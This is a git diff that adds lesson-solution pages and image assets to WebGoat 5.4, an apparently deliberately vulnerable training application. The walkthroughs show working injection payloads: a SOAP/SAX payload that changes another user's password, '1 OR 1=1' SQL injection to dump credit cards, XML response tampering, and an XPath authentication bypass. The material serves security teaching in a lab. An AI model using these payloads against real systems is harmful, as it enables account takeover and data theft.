Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image018.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image020.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image020.jpg
new file mode 100644
index 000000000..b825cea5d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image020.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image021.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image021.jpg
new file mode 100644
index 000000000..a7fd9b516
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image021.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image022.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image022.jpg
new file mode 100644
index 000000000..b38898623
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image022.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image023.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image023.jpg
new file mode 100644
index 000000000..0c3616032
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image023.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image024.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image024.jpg
new file mode 100644
index 000000000..632ca5835
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image024.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image025.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image025.jpg
new file mode 100644
index 000000000..0ab015bbb
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image025.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image026.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image026.jpg
new file mode 100644
index 000000000..bc5a7fe32
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image026.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image027.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image027.jpg
new file mode 100644
index 000000000..7bbdb5f09
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image027.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image028.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image028.jpg
new file mode 100644
index 000000000..4530c95f9
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image028.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image029.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image029.jpg
new file mode 100644
index 000000000..112d5259b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image029.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection.html
new file mode 100644
index 000000000..c5e854290
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection.html
@@ -0,0 +1,917 @@
+
+
+
+Solution: Web Service SAX Injection
+
+
+
Lesson Plan Title: How to Perform Web Service SAX
+Injection
+
+
+
+
Concept / Topic To Teach:
+
+
+
+
Web Services
+communicate through the use of SOAP requests. These requests are submitted to a
+web service in an attempt to execute a function defined in the web service
+definition language (WSDL) file.
+
+
+
+
General Goal(s):
+
+
Some web
+interfaces make use of Web Services in the background. If the frontend relies
+on the web service for all input validation, it may be possible to corrupt the
+XML that the web interface sends.
+
+
In this
+exercise, try to change the password for a user other than 101.
+
+
+
+
+
+
+
+
Solution:
+
+
+
+
To succeed
+this lesson it is required to reset the password of the user with a different
+user-ID then 101 (which is your user-ID)
+
+
.
+
+
When you fill
+out a password and click on "Go!" the following XML request will be created,
+submit and parsed by the SAX parser:
+
+
+
+
<?xml version='1.0' encoding='UTF-8'?> <wsns0:Envelope xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/' xmlns:wsns1='http://lessons.webgoat.owasp.org'> <wsns0:Body> <wsns1:changePassword> <id xsi:type='xsd:int'>101</id> <password xsi:type='xsd:string'>[password]</password> </wsns1:changePassword> </wsns0:Body></wsns0:Envelope>
+
+
+
+
SAX parsers will parse anything that
+is well-formed, meaning that there are matching end and close tags and that the
+schema is correct. When you are able to add a new changePAssword element with
+corresponding id tag and password tag, the SAX parser will be more than happy
+to change the password for the user-ID provided.
+
+
So you need to have something like
+this as a final result:
+
+
+
+
<?xml version='1.0'
+encoding='UTF-8'?>
+
+
<wsns0:Envelope
+
+
+ xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+
+
+ xmlns:xsd='http://www.w3.org/2001/XMLSchema'
+
+
+ xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'
+
+
+ xmlns:wsns1='http://lessons.webgoat.owasp.org'>
+
+
+ <wsns0:Body>
+
+
+ <wsns1:changePassword>
+
+
+ <id xsi:type='xsd:int'>101</id>
+
+
+ <password xsi:type='xsd:string'>[password]</password>
+
+
+ </wsns1:changePassword>
+
+
+ <wsns1:changePassword>
+
+
+ <id xsi:type='xsd:int'>102</id>
+
+
+ <password xsi:type='xsd:string'>notforyoutoknow</password>
+
+
+ </wsns1:changePassword>
+
+
+ </wsns0:Body>
+
+
</wsns0:Envelope>
+
+
+
+
This requires to inject:
+
+
newpassword</password>
+
+
+ </wsns1:changePassword>
+
+
+ <wsns1:changePassword>
+
+
+ <id xsi:type='xsd:int'>102</id>
+
+
+ <password xsi:type='xsd:string'>notforyoutoknow
+
+
+
+
There are field-limitations in the
+HTML input field, so it is required to intercept the HTTP Request with
+WebScarab and replace the parameter password with the payload.
+
+
+
+
Enter a password 'test' and click
+"Go!".
+
+
+
+
Figure
+113 Reset password with test
+
+
+
+
Intercept the request in WebScarab and
+replace the string test with the payload.
+
+
+
+
+
+
Figure
+114 Intercept request
+
+
+
+
+
+
Figure
+115 Inject XML payload
+
+
+
+
+
+
Figure
+116 Lesson completed
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png
new file mode 100644
index 000000000..ba76d14d9
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg
new file mode 100644
index 000000000..24692deda
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png
new file mode 100644
index 000000000..be045e27f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg
new file mode 100644
index 000000000..c6698ffba
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png
new file mode 100644
index 000000000..84e5ff852
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg
new file mode 100644
index 000000000..40dcd7832
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png
new file mode 100644
index 000000000..94b298db1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg
new file mode 100644
index 000000000..9faeaaac1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png
new file mode 100644
index 000000000..acdfd2592
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg
new file mode 100644
index 000000000..ad7400d38
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection.html
new file mode 100644
index 000000000..c9423fcdc
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection.html
@@ -0,0 +1,767 @@
+
+
+
+Solution: Web Service SQL Injection
+
+
+
Lesson
+Plan Title: How to
+Perform Web Service SQL Injection
+
+
+
+
Concept /
+Topic To Teach:
+
+
Web
+Services communicate through the use of SOAP requests. These requests are
+submitted to a web service in an attempt to execute a function defined in the
+web service definition language (WSDL) file.
+
+
+
+
General
+Goal(s):
+
+
Check the web
+service description language (WSDL) file and try to obtain multiple customer
+credit card numbers. You will not see the results returned to this screen. When
+you believe you have suceeded, refresh the page and look for the 'green star'.
+
+
Solution:
+
+
+
+
This lesson
+can be solved easily by using a web services tool called SOAPUI. But here you
+will only use WebScarab. Go in WebScarab to the tab "Web Services". You will
+see a history of invoked web services or WSDL files.
+
+
+
+
+
+
Figure 1 Lesson 23
+
+
+
+
Open the
+WebGoat WSDL file for this lesson (WsSqlInjection?WSDL) in a new window.
+
+
+
+
In WebScarab
+you can select this WSDL from the top drop-down box. And WebScarab will parse
+the XML file so you can select the operations to invoke. Then you can enter a
+value for the parameters used to invoke the operation. For example fill out the
+integer 101 for the ID value and click "Execute". WebScarab will pop-up a basic
+authentication window. Enter username:guest, password:guest and host:localhost then click "Ok".
+If the pop-up does not appear you have to go to "Tools" > "Credentials". There you should activate "Ask when required".
+
+
+
+
+
+
Figure 2 Basic authentication
+
+
+
+
+
+
Figure 3 Webservice Response
+
+
+
+
What happens
+if you change 101 to 1 OR 1=1? Will you get all the credit cards?
+
+
Yes J
+
+
+
+
+
+
Figure 4 All the credit cards
+
+
+
+
Remark: when you don't get any responses you
+might want to select the service and operation again from the drop-down box. A nice
+feature here would be the ability to make a raw SOAP request.
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png
new file mode 100644
index 000000000..82abbd808
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg
new file mode 100644
index 000000000..60c86b971
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png
new file mode 100644
index 000000000..e658bb1b9
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg
new file mode 100644
index 000000000..cb476bc0d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png
new file mode 100644
index 000000000..d1db6bcb8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg
new file mode 100644
index 000000000..f3e91d5e9
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png
new file mode 100644
index 000000000..d3bd79b6b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg
new file mode 100644
index 000000000..50c57e172
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection.html
new file mode 100644
index 000000000..6bfd82437
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection.html
@@ -0,0 +1,862 @@
+
+
+
+Solution: XML Injection
+
+
+
Lesson
+Plan Title: How to
+Perform XML Injection Attacks.
+
+
+
+
Concept /
+Topic To Teach:
+
+
This lesson
+teaches how to perform XML Injection attacks.
+
+
+
+
How the
+attacks works:
+
+
AJAX applications
+use XML to exchange information with the server. This XML can be easily
+intercepted and altered by a malicious attacker.
+
+
+
+
General
+Goal(s):
+
+
WebGoat-Miles
+Reward Miles shows all the rewards available. Once you've entered your account
+ID, the lesson will show you your balance and the products you can afford. Your
+goal is to try to add more rewards to your allowed set of rewards. Your account
+ID is 836239.
+
+
+
+
+
+
Figure 1 AJAX Security - XML Injection
+
+
+
+
Solution:
+
+
+
+
To understand
+the behavior of the AJAX application, enter your account number 836239 and
+intercept the HTTP Request and HTTP Response using WebScarab.
+
+
+
+
+
+
Figure 2 Enter account number
+
+
+
+
+
+
Figure 3 Intercepted HTTP Request
+
+
+
+
+
+
Figure 4 Intercepted HTTP Response
+
+
+
+
From the HTTP Response you can see that you get back an XML
+message with the rewards for your account:
+
+
+
+
<root>
+
+
<reward>WebGoat t-shirt 20 Pts</reward>
+
+
<reward>WebGoat Secure Kettle 50 Pts</reward>
+
+
<reward>WebGoat Mug 30 Pts</reward>
+
+
</root>
+
+
+
+
What happens if you intercept this HTTP Response and update
+the XML message to become:
+
+
+
+
<root>
+
+
<reward>WebGoat t-shirt 20 Pts</reward>
+
+
<reward>WebGoat Secure Kettle 50 Pts</reward>
+
+
<reward>WebGoat Mug 30 Pts</reward>
+
+
<reward>WebGoat Core Duo Laptop 2000
+Pts</reward>
+
+
<reward>WebGoat Hawaii Cruise 3000 Pts</reward>
+
+
</root>
+
+
+
+
+
+
Figure 5 Changed XML response
+
+
+
+
You need to
+do this three times!
+
+
+
+
+
+
Figure 6 Injected XML results
+
+
+
+
+
+
Figure 7 Select your reward
+
+
+
+
Select the
+Laptop and the Cruise and click "Submit".
+
+
+
+
+
+
Figure 8 Lesson completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png
new file mode 100644
index 000000000..b32e9194e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png
new file mode 100644
index 000000000..f0de7feb1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png
new file mode 100644
index 000000000..d2589d1b8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png
new file mode 100644
index 000000000..d2489a851
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png
new file mode 100644
index 000000000..c2b095cd1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png
new file mode 100644
index 000000000..e316c46cb
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png
new file mode 100644
index 000000000..2c485734d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png
new file mode 100644
index 000000000..f59f4c79b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg
new file mode 100644
index 000000000..5cde78c29
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg
new file mode 100644
index 000000000..50a020099
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg
new file mode 100644
index 000000000..3ec8d20a1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg
new file mode 100644
index 000000000..3181beb41
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg
new file mode 100644
index 000000000..164e97f7d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg
new file mode 100644
index 000000000..155301a55
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg
new file mode 100644
index 000000000..3ed684669
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg
new file mode 100644
index 000000000..00a8ad33b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection.html
new file mode 100644
index 000000000..09208cf6d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection.html
@@ -0,0 +1,788 @@
+
+
+
+Solution: XPATH Injection
+
+
+
Lesson
+Plan Title: How to
+Perform XPATH Injection Attacks.
+
+
+
+
Concept /
+Topic To Teach:
+
+
This lesson
+teaches how to perform XPath Injection attacks.
+
+
+
+
How the
+attacks works:
+
+
Similar to SQL
+Injection, XPATH Injection attacks occur when a web site uses user supplied
+information to query XML data. By sending intentionally malformed information
+into the web site, an attacker can find out how the XML data is structured or
+access data that they may not normally have access to. They may even be able to
+elevate their privileges on the web site if the xml data is being used for
+authentication (such as an xml based user file). Querying XML is done with
+XPath, a type of simple descriptive statement that allows the xml query to
+locate a piece of information. Like SQL you can specify certain attributes to
+find and patterns to match. When using XML for a web site it is common to
+accept some form of input on the query string to identify the content to locate
+and display on the page. This input must be sanitized to verify that it doesn't
+mess up the XPath query and return the wrong data.
+
+
+
+
General
+Goal(s):
+
+
The
+form below allows employees to see all their personal data including their
+salaries. Your account is Mike/test123. Your goal is to try to see other
+employees data as well.
+
+
+
+
+
+
Figure 1 XPath Injection
+
+
+
+
XPath injection is similar to SQL Injection. Input is not validated and
+used to create a XPath query. Here you can see how the XPATH query is built:String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");username + "' and passwd/text()='" + password + "']";
+
+
+
+
+
+
Figure 2 Inject XPath payload
+
+
+Injecting Smith' or 1=1 or 'a'='a will log you on
+as the first user defined in the system. Password is a required field, so there
+you can enter whatever you want.expression = "/employees/employee[loginID/text()='Smith' or 1=1 or 'a'='a ' and passwd/text()='password ']" expression = "/employees/employee[ ( loginID/text()='Smith' or 1=1 ) OR ( 'a'='a ' and passwd/text()='password ' ) ]"
+
+
+
+
Figure 3 Lesson completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png
new file mode 100644
index 000000000..c710b2228
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png
new file mode 100644
index 000000000..aa3b3886c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png
new file mode 100644
index 000000000..c63e9830a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg
new file mode 100644
index 000000000..a74456833
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg
new file mode 100644
index 000000000..229e969db
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg
new file mode 100644
index 000000000..731010dab
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg differ
